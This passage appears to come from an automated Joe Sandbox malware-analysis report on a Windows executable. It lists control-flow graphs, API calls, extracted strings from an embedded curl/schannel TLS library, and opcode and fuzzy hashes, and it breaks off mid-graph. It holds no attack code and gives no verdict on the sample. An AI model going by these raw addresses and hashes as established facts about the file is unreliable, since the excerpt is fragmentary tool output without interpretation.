1424->1441 1442 7ff6029dc49e-7ff6029dc4a5 1424->1442 1439 7ff6029dc162-7ff6029dc167 1427->1439 1440 7ff6029dc174-7ff6029dc179 1427->1440 1428->1427 1433 7ff6029dc0d8-7ff6029dc0dc 1428->1433 1433->1362 1433->1427 1439->1440 1443 7ff6029dc169-7ff6029dc16e 1439->1443 1444 7ff6029dc17f-7ff6029dc1a9 1440->1444 1445 7ff6029dc21e-7ff6029dc222 1440->1445 1441->1401 1442->1421 1443->1440 1448 7ff6029dc417-7ff6029dc41d 1443->1448 1449 7ff6029dc1b0-7ff6029dc1cb realloc 1444->1449 1450 7ff6029dc1ab-7ff6029dc1ae 1444->1450 1445->1367 1447 7ff6029dc228-7ff6029dc22d 1445->1447 1447->1367 1452 7ff6029dc233-7ff6029dc245 1447->1452 1456 7ff6029dc41f-7ff6029dc430 1448->1456 1457 7ff6029dc446-7ff6029dc471 call 7ff6029b2620 call 7ff6029c6400 1448->1457 1454 7ff6029dc1d1-7ff6029dc1f1 1449->1454 1455 7ff6029dc476-7ff6029dc48d call 7ff6029c6280 1449->1455 1450->1449 1453 7ff6029dc1f5-7ff6029dc1f9 1450->1453 1452->1383 1459 7ff6029dc24b-7ff6029dc26c memcpy 1452->1459 1461 7ff6029dc1fb-7ff6029dc218 memcpy 1453->1461 1462 7ff6029dc21c 1453->1462 1454->1453 1455->1362 1463 7ff6029dc432 1456->1463 1464 7ff6029dc43a-7ff6029dc441 1456->1464 1457->1362 1459->1373 1461->1462 1462->1445 1463->1464 1464->1420
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: schannel: Curl_read_plain returned CURLE_RECV_ERROR$schannel: Curl_read_plain returned error %d$schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: can't renogotiate, an error is pending$schannel: can't renogotiate, encrypted data available$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server closed abruptly (missing close_notify)$schannel: server closed the connection$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                                        • API String ID: 3510742995-857957974
                                        • Opcode ID: 966759b5d53be3e0d943f949ba4fc5e4ed078181e8ab816f75f7559d8e9d140b
                                        • Instruction ID: fcd9141b1b13c8fe41769a89027b2196cf81c417815bb6dbf692ceb6f4b09c28
                                        • Opcode Fuzzy Hash: 966759b5d53be3e0d943f949ba4fc5e4ed078181e8ab816f75f7559d8e9d140b
                                        • Instruction Fuzzy Hash: 9A02D072A08B4685EB60DB1AD4843BA2BA4FF44B98F704536DE4DC77A6DFB8E441D700

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1589 7ff6029db360-7ff6029db3ce 1590 7ff6029db3f0 1589->1590 1591 7ff6029db3d0-7ff6029db3e5 1589->1591 1593 7ff6029db3f7-7ff6029db411 1590->1593 1591->1590 1592 7ff6029db3e7-7ff6029db3ee 1591->1592 1592->1593 1594 7ff6029dbadb 1593->1594 1595 7ff6029db417-7ff6029db41c 1593->1595 1595->1594 1596 7ff6029db422-7ff6029db430 1595->1596 1597 7ff6029db472-7ff6029db476 1596->1597 1598 7ff6029db432-7ff6029db46c malloc 1596->1598 1600 7ff6029db4c3-7ff6029db4d4 1597->1600 1601 7ff6029db478-7ff6029db4bd malloc 1597->1601 1598->1597 1599 7ff6029dbacf 1598->1599 1599->1594 1602 7ff6029db4d6-7ff6029db4f0 realloc 1600->1602 1603 7ff6029db548-7ff6029db54a 1600->1603 1601->1599 1601->1600 1604 7ff6029db4f2-7ff6029db4fc call 7ff6029c6280 1602->1604 1605 7ff6029db530-7ff6029db546 1602->1605 1606 7ff6029db5aa-7ff6029db651 call 7ff6029c8cd0 malloc 1603->1606 1607 7ff6029db54c-7ff6029db570 call 7ff6029c6600 1603->1607 1612 7ff6029db501 1604->1612 1605->1603 1606->1599 1614 7ff6029db657-7ff6029db671 memcpy 1606->1614 1613 7ff6029db575-7ff6029db578 1607->1613 1615 7ff6029db506-7ff6029db52f call 7ff6029fff10 1612->1615 1616 7ff6029db7ef-7ff6029db7f6 1613->1616 1617 7ff6029db57e-7ff6029db580 1613->1617 1614->1612 1618 7ff6029db677-7ff6029db6e3 free 1614->1618 1622 7ff6029db7fc-7ff6029db808 1616->1622 1623 7ff6029dbac8-7ff6029dbaca 1616->1623 1620 7ff6029db7d6-7ff6029db7ea call 7ff6029c6280 1617->1620 1621 7ff6029db586-7ff6029db58e 1617->1621 1629 7ff6029dbab3-7ff6029dbaba 1618->1629 1630 7ff6029db6e9-7ff6029db6f0 1618->1630 1620->1615 1621->1620 1626 7ff6029db594-7ff6029db5a6 1621->1626 1622->1615 1623->1615 1626->1606 1631 7ff6029dbabe 1629->1631 1632 7ff6029dba5c-7ff6029dba68 1630->1632 1633 7ff6029db6f6-7ff6029db6fd 1630->1633 1631->1623 1636 7ff6029dba9b-7ff6029dbaae 1632->1636 1637 7ff6029dba6a-7ff6029dba96 call 7ff6029b2620 call 7ff6029c6280 1632->1637 1634 7ff6029db6ff-7ff6029db702 1633->1634 1635 7ff6029db708-7ff6029db70f 1633->1635 1634->1635 1638 7ff6029db80d-7ff6029db814 1634->1638 1639 7ff6029db710-7ff6029db714 1635->1639 1636->1615 1637->1615 1644 7ff6029db854-7ff6029db87d call 7ff6029b2620 call 7ff6029c6280 1638->1644 1645 7ff6029db816-7ff6029db81d 1638->1645 1641 7ff6029db753-7ff6029db75a 1639->1641 1642 7ff6029db716-7ff6029db71a 1639->1642 1646 7ff6029db75c 1641->1646 1647 7ff6029db769-7ff6029db772 1641->1647 1642->1641 1650 7ff6029db71c-7ff6029db737 call 7ff6029c6b40 1642->1650 1644->1612 1645->1637 1648 7ff6029db823-7ff6029db84f call 7ff6029b2620 call 7ff6029c6280 1645->1648 1646->1647 1647->1639 1653 7ff6029db774-7ff6029db778 1647->1653 1648->1615 1661 7ff6029db73c-7ff6029db742 1650->1661 1658 7ff6029db77e-7ff6029db783 1653->1658 1659 7ff6029db8a8-7ff6029db8af 1653->1659 1658->1659 1663 7ff6029db789-7ff6029db79a 1658->1663 1665 7ff6029db8b7-7ff6029db8be 1659->1665 1666 7ff6029db882-7ff6029db8a3 call 7ff6029c6280 1661->1666 1667 7ff6029db748-7ff6029db74d 1661->1667 1663->1665 1669 7ff6029db7a0-7ff6029db7c4 memcpy 1663->1669 1665->1631 1671 7ff6029db8c4-7ff6029db8c7 1665->1671 1666->1615 1667->1641 1667->1666 1669->1671 1674 7ff6029db7ca-7ff6029db7cf 1669->1674 1672 7ff6029db8d3-7ff6029db8db 1671->1672 1673 7ff6029db8c9 1671->1673 1676 7ff6029db903 1672->1676 1677 7ff6029db8dd-7ff6029db8f7 1672->1677 1673->1672 1674->1620 1679 7ff6029db90b-7ff6029db90e 1676->1679 1677->1676 1678 7ff6029db8f9-7ff6029db901 1677->1678 1678->1679 1680 7ff6029db914-7ff6029db945 1679->1680 1681 7ff6029dba30-7ff6029dba38 1679->1681 1686 7ff6029dba03-7ff6029dba2e call 7ff6029b2620 call 7ff6029c6280 1680->1686 1687 7ff6029db94b-7ff6029db953 1680->1687 1681->1623 1682 7ff6029dba3e-7ff6029dba49 1681->1682 1682->1623 1683 7ff6029dba4b-7ff6029dba57 call 7ff6029f63e0 1682->1683 1683->1615 1692 7ff6029db9d5-7ff6029db9d8 1686->1692 1687->1686 1690 7ff6029db959-7ff6029db95c 1687->1690 1690->1692 1693 7ff6029db95e-7ff6029db965 1690->1693 1695 7ff6029db9e0-7ff6029db9e2 1692->1695 1696 7ff6029db9da CertFreeCertificateContext 1692->1696 1697 7ff6029db9d0 1693->1697 1698 7ff6029db967-7ff6029db98e memset call 7ff6029f8dc0 1693->1698 1695->1681 1700 7ff6029db9e4-7ff6029db9f5 call 7ff6029c6280 1695->1700 1696->1695 1697->1692 1705 7ff6029db990-7ff6029db99a 1698->1705 1706 7ff6029db9cb 1698->1706 1700->1615 1707 7ff6029db9fa-7ff6029dba01 1705->1707 1708 7ff6029db99c-7ff6029db9a6 1705->1708 1706->1697 1709 7ff6029db9c3-7ff6029db9c6 call 7ff6029c6280 1707->1709 1708->1707 1710 7ff6029db9a8-7ff6029db9ba call 7ff6029bf9f0 1708->1710 1709->1706 1710->1706 1714 7ff6029db9bc 1710->1714 1714->1709
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: malloc$memcpy$CertCertificateContextFreefreememsetrealloc
                                        • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key!$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                        • API String ID: 860210379-3059304359
                                        • Opcode ID: c51a1515f50f637c22297d28eec8f1a9dec197cff128be308b43eba9b8a7ceae
                                        • Instruction ID: ee25aa4f601400f20c8cbd1440a1000aee5c30e4d1c5ab4a3aaf3403e6e311a5
                                        • Opcode Fuzzy Hash: c51a1515f50f637c22297d28eec8f1a9dec197cff128be308b43eba9b8a7ceae
                                        • Instruction Fuzzy Hash: 81126332A08B8186EB60CF2AD8543AE7BA4FF44B9CF210136CA5D97795DFB8D545D700

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1715 7ff6029da580-7ff6029da5f0 1716 7ff6029da5f2-7ff6029da604 1715->1716 1717 7ff6029da60f 1715->1717 1716->1717 1718 7ff6029da606-7ff6029da60d 1716->1718 1719 7ff6029da616-7ff6029da630 call 7ff6029c9110 1717->1719 1718->1719 1722 7ff6029da632-7ff6029da63c call 7ff6029c6400 1719->1722 1723 7ff6029da641-7ff6029da648 1719->1723 1722->1723 1725 7ff6029da64a-7ff6029da66a GetModuleHandleA GetProcAddress 1723->1725 1726 7ff6029da688 1723->1726 1725->1726 1727 7ff6029da66c-7ff6029da682 call 7ff6029c9110 1725->1727 1728 7ff6029da68a-7ff6029da69b 1726->1728 1727->1726 1735 7ff6029da684-7ff6029da686 1727->1735 1730 7ff6029da6c0 1728->1730 1731 7ff6029da69d-7ff6029da6b5 1728->1731 1734 7ff6029da6c7-7ff6029da6ca 1730->1734 1731->1730 1733 7ff6029da6b7-7ff6029da6be 1731->1733 1733->1734 1736 7ff6029da70b-7ff6029da712 1734->1736 1737 7ff6029da6cc-7ff6029da6e3 call 7ff6029c9110 1734->1737 1735->1728 1738 7ff6029da716-7ff6029da727 1736->1738 1743 7ff6029da6f2-7ff6029da706 call 7ff6029c6280 1737->1743 1744 7ff6029da6e5-7ff6029da6f0 1737->1744 1741 7ff6029da74c 1738->1741 1742 7ff6029da729-7ff6029da741 1738->1742 1746 7ff6029da753-7ff6029da755 1741->1746 1742->1741 1745 7ff6029da743-7ff6029da74a 1742->1745 1754 7ff6029db30d-7ff6029db336 call 7ff6029fff10 1743->1754 1744->1738 1745->1746 1748 7ff6029da757-7ff6029da773 call 7ff6029c0c70 call 7ff6029c0690 1746->1748 1749 7ff6029da798-7ff6029da7a2 1746->1749 1774 7ff6029da775-7ff6029da78d 1748->1774 1775 7ff6029da790-7ff6029da793 call 7ff6029c0ca0 1748->1775 1751 7ff6029db017-7ff6029db02e call 7ff6029d8210 1749->1751 1752 7ff6029da7a8-7ff6029da7d3 1749->1752 1770 7ff6029db043-7ff6029db04d call 7ff6029c6400 1751->1770 1771 7ff6029db030-7ff6029db041 call 7ff6029d8210 1751->1771 1755 7ff6029da7d5-7ff6029da7ec 1752->1755 1756 7ff6029da80b 1752->1756 1760 7ff6029da7f5-7ff6029da7fc 1755->1760 1761 7ff6029da7ee-7ff6029da7f3 1755->1761 1762 7ff6029da810-7ff6029da81a 1756->1762 1766 7ff6029da805-7ff6029da809 1760->1766 1767 7ff6029da7fe-7ff6029da803 1760->1767 1761->1762 1768 7ff6029da822-7ff6029da82d 1762->1768 1769 7ff6029da81c-7ff6029da81f 1762->1769 1766->1762 1767->1762 1777 7ff6029da833-7ff6029da848 1768->1777 1778 7ff6029dafff-7ff6029db00e call 7ff6029c6280 1768->1778 1769->1768 1779 7ff6029db052-7ff6029db05d 1770->1779 1771->1770 1771->1779 1774->1775 1775->1749 1777->1778 1778->1751 1788 7ff6029db308 1778->1788 1783 7ff6029db063-7ff6029db0e4 call 7ff6029c6400 call 7ff6029c8c90 1779->1783 1784 7ff6029db0e6-7ff6029db0f8 1779->1784 1786 7ff6029db0fd-7ff6029db155 calloc 1783->1786 1784->1786 1790 7ff6029db170-7ff6029db173 1786->1790 1791 7ff6029db157-7ff6029db161 call 7ff6029c6280 1786->1791 1788->1754 1793 7ff6029db175-7ff6029db1d3 1790->1793 1794 7ff6029db166-7ff6029db16b 1790->1794 1791->1794 1798 7ff6029db27c-7ff6029db298 call 7ff6029c6b40 1793->1798 1799 7ff6029db1d9-7ff6029db208 free 1793->1799 1794->1754 1806 7ff6029db29d-7ff6029db2ba 1798->1806 1800 7ff6029db20a-7ff6029db210 1799->1800 1801 7ff6029db256-7ff6029db277 call 7ff6029b2620 call 7ff6029c6280 1799->1801 1804 7ff6029db212-7ff6029db22b call 7ff6029b2620 call 7ff6029c6280 1800->1804 1805 7ff6029db230-7ff6029db251 call 7ff6029b2620 call 7ff6029c6280 1800->1805 1801->1754 1804->1788 1805->1754 1814 7ff6029db2bc-7ff6029db2bf 1806->1814 1815 7ff6029db2f9-7ff6029db300 1806->1815 1814->1815 1820 7ff6029db2c1-7ff6029db2f7 1814->1820 1815->1788 1821 7ff6029db303 call 7ff6029c6280 1815->1821 1820->1754 1821->1788
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: Unrecognized parameter passed via CURLOPT_SSLVERSION$http/1.1$http/1.1$ntdll$schannel: ALPN, offering %s$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                                        • API String ID: 1646373207-2477831187
                                        • Opcode ID: d57ec49c3c53d2e7659c321bd1063c803722725deb7dab99f2f8bcb1873c1948
                                        • Instruction ID: 3979eff588ea3d74e8908ec43ec0520186a79a050b779fea1ae33bb8cbbf49ce
                                        • Opcode Fuzzy Hash: d57ec49c3c53d2e7659c321bd1063c803722725deb7dab99f2f8bcb1873c1948
                                        • Instruction Fuzzy Hash: 8B028D32A08B818AEB508F26D8903EE3BA4FF44B8CF604535DA5D87796DFB8E555D700

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1823 7ff6029bbbc0-7ff6029bbc0b calloc 1824 7ff6029bbc11-7ff6029bbc9a malloc 1823->1824 1825 7ff6029bbd4e-7ff6029bbd57 _errno 1823->1825 1827 7ff6029bbcd7-7ff6029bbcde 1824->1827 1828 7ff6029bbc9c-7ff6029bbcc1 InitializeCriticalSectionEx call 7ff6029d5370 1824->1828 1826 7ff6029bbd59-7ff6029bbd75 1825->1826 1830 7ff6029bbcf0-7ff6029bbd01 free 1827->1830 1831 7ff6029bbce0-7ff6029bbcea DeleteCriticalSection free 1827->1831 1838 7ff6029bbcc7-7ff6029bbccf 1828->1838 1839 7ff6029bbd76-7ff6029bbd8a _strdup 1828->1839 1833 7ff6029bbd03 call 7ff6029d8f90 1830->1833 1834 7ff6029bbd08-7ff6029bbd10 1830->1834 1831->1830 1833->1834 1836 7ff6029bbd12 closesocket 1834->1836 1837 7ff6029bbd18-7ff6029bbd48 free 1834->1837 1836->1837 1837->1825 1838->1827 1839->1827 1840 7ff6029bbd90-7ff6029bbdb0 free _strdup 1839->1840 1841 7ff6029bbdde-7ff6029bbde8 1840->1841 1842 7ff6029bbdb2-7ff6029bbdc1 call 7ff6029d9660 1840->1842 1844 7ff6029bbe61-7ff6029bbe7c free 1841->1844 1845 7ff6029bbdea-7ff6029bbe12 EnterCriticalSection LeaveCriticalSection 1841->1845 1846 7ff6029bbdc6-7ff6029bbdcc 1842->1846 1844->1825 1847 7ff6029bbe25-7ff6029bbe28 1845->1847 1848 7ff6029bbe14-7ff6029bbe1c CloseHandle 1845->1848 1851 7ff6029bbe1e-7ff6029bbe20 1846->1851 1852 7ff6029bbdce-7ff6029bbddb _errno 1846->1852 1849 7ff6029bbe32-7ff6029bbe42 call 7ff6029bba40 free 1847->1849 1850 7ff6029bbe2a-7ff6029bbe2d call 7ff6029d96b0 1847->1850 1853 7ff6029bbe48-7ff6029bbe4b 1848->1853 1849->1853 1850->1849 1851->1826 1852->1841 1856 7ff6029bbe58-7ff6029bbe5b closesocket 1853->1856 1857 7ff6029bbe4d-7ff6029bbe53 call 7ff6029b6410 1853->1857 1856->1844 1857->1856
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$CriticalSection$_errno_strdupclosesocket$CloseDeleteEnterHandleInitializeLeavecallocmallocsocket
                                        • String ID:
                                        • API String ID: 259767416-0
                                        • Opcode ID: 98ff7efcc35b3caf98631185ed50eeb00e79665cefe7d7535eea2b1d5459b9c6
                                        • Instruction ID: efb3a9d88216690a28e9ae5a0a270d39e6208ebe6064d4e07a3c863bafa891da
                                        • Opcode Fuzzy Hash: 98ff7efcc35b3caf98631185ed50eeb00e79665cefe7d7535eea2b1d5459b9c6
                                        • Instruction Fuzzy Hash: 2D815C26A05B8182E725DF12E56026A7760FF98B58F245235DF9E436A2DFBCE4D4C300
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NTLM picked AND auth done set, clear picked!$NTLM-proxy picked AND auth done set, clear picked!$No connections available in cache$No connections available.$No more connections allowed to host %s: %zu$Re-using existing connection! (#%ld) with %s %s$anonymous$ftp@example.com$host$proxy
                                        • API String ID: 0-760484938
                                        • Opcode ID: 88e9fff4c20cfb3387b05bb6273276a309f0730b87b5b8ee6ee5db605b16326a
                                        • Instruction ID: 5c17448e95b3df79d300959e0f713ed2622d31bccfdd717f9393115907854b20
                                        • Opcode Fuzzy Hash: 88e9fff4c20cfb3387b05bb6273276a309f0730b87b5b8ee6ee5db605b16326a
                                        • Instruction Fuzzy Hash: BB429D22A09BC291EB59DB2695403B97BA4FF45F88F288575CE5D87786DFB8E460C300

                                        Control-flow Graph

                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029B2471,?,?,?,?,00007FF6029A35A1), ref: 00007FF6029C21D8
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029C2221
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: callocfree
                                        • String ID: <$<$<$`$v
                                        • API String ID: 306872129-2056843887
                                        • Opcode ID: fd20e6cdcbd1a73617437685a3d3e5ab8989bec76236420843f0ff4b3c7dbce2
                                        • Instruction ID: 0ee8b60d5bb1284f2747feed64a6f93c642e714c1d84bad872a42387ba649bd3
                                        • Opcode Fuzzy Hash: fd20e6cdcbd1a73617437685a3d3e5ab8989bec76236420843f0ff4b3c7dbce2
                                        • Instruction Fuzzy Hash: 39915C32908BC186E310CF34D4543E93BA0FB55B5CF185238CE994B39ADFBAA195C720

                                        Control-flow Graph

                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,?,00007FF6029F2DCA,?,?,?,?,00007FF6029C92FB), ref: 00007FF6029C8F84
                                        • GetProcAddress.KERNEL32(?,?,00007FF6029F2DCA,?,?,?,?,00007FF6029C92FB), ref: 00007FF6029C8FA9
                                        • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00007FF6029F2DCA,?,?,?,?,00007FF6029C92FB), ref: 00007FF6029C8FBC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcstrpbrk
                                        • String ID: AddDllDirectory$LoadLibraryExA$kernel32
                                        • API String ID: 27745253-3327535076
                                        • Opcode ID: 3fc36237d5a699e2f99facc73201d44ad9495a081454105c969e389c3d98dd0d
                                        • Instruction ID: 45f92042372da348cf509db103bf1248fd93516c07ed03af1e915ff86f8bd141
                                        • Opcode Fuzzy Hash: 3fc36237d5a699e2f99facc73201d44ad9495a081454105c969e389c3d98dd0d
                                        • Instruction Fuzzy Hash: 0E41E312B0974286FB158F17A4542396BA1FF8AFE9F288530CE5D87791EE7DE486C300

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_errnogetpeernamegetsockname
                                        • String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                        • API String ID: 2911674258-670633250
                                        • Opcode ID: beb777fae94bd714a0210b54ee0db9f5296f82d4134aa8963846ed8433313220
                                        • Instruction ID: 1750771fc6b431fcd7b4d45d3e58186e3a7d9f23c2e88c5481f85c3adee2ce35
                                        • Opcode Fuzzy Hash: beb777fae94bd714a0210b54ee0db9f5296f82d4134aa8963846ed8433313220
                                        • Instruction Fuzzy Hash: C2918E26A18BC182D710CF26D4542E977A4FB88F8CF249236EE4C87656EF79E185CB10

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2295 7ff6029d8fe0-7ff6029d900d getaddrinfo 2296 7ff6029d9013-7ff6029d9025 2295->2296 2297 7ff6029d91a4-7ff6029d91b1 2295->2297 2298 7ff6029d9184-7ff6029d918d WSASetLastError 2296->2298 2299 7ff6029d902b 2296->2299 2301 7ff6029d9193-7ff6029d91a0 2298->2301 2300 7ff6029d9030-7ff6029d9036 2299->2300 2302 7ff6029d903d-7ff6029d9040 2300->2302 2303 7ff6029d9038-7ff6029d903b 2300->2303 2301->2297 2305 7ff6029d90f1-7ff6029d90f8 2302->2305 2306 7ff6029d9046 2302->2306 2304 7ff6029d9049-7ff6029d904d 2303->2304 2304->2305 2307 7ff6029d9053-7ff6029d905a 2304->2307 2305->2300 2308 7ff6029d90fe 2305->2308 2306->2304 2307->2305 2310 7ff6029d9060-7ff6029d9063 2307->2310 2309 7ff6029d9132-7ff6029d913f 2308->2309 2311 7ff6029d9141 freeaddrinfo 2309->2311 2312 7ff6029d9147-7ff6029d914a 2309->2312 2310->2305 2313 7ff6029d9069-7ff6029d907a malloc 2310->2313 2311->2312 2314 7ff6029d917f-7ff6029d9182 2312->2314 2315 7ff6029d914c-7ff6029d914f 2312->2315 2316 7ff6029d9080-7ff6029d90b5 malloc 2313->2316 2317 7ff6029d912c 2313->2317 2314->2298 2314->2301 2318 7ff6029d9151-7ff6029d9178 free * 3 2315->2318 2319 7ff6029d917a-7ff6029d917d 2315->2319 2320 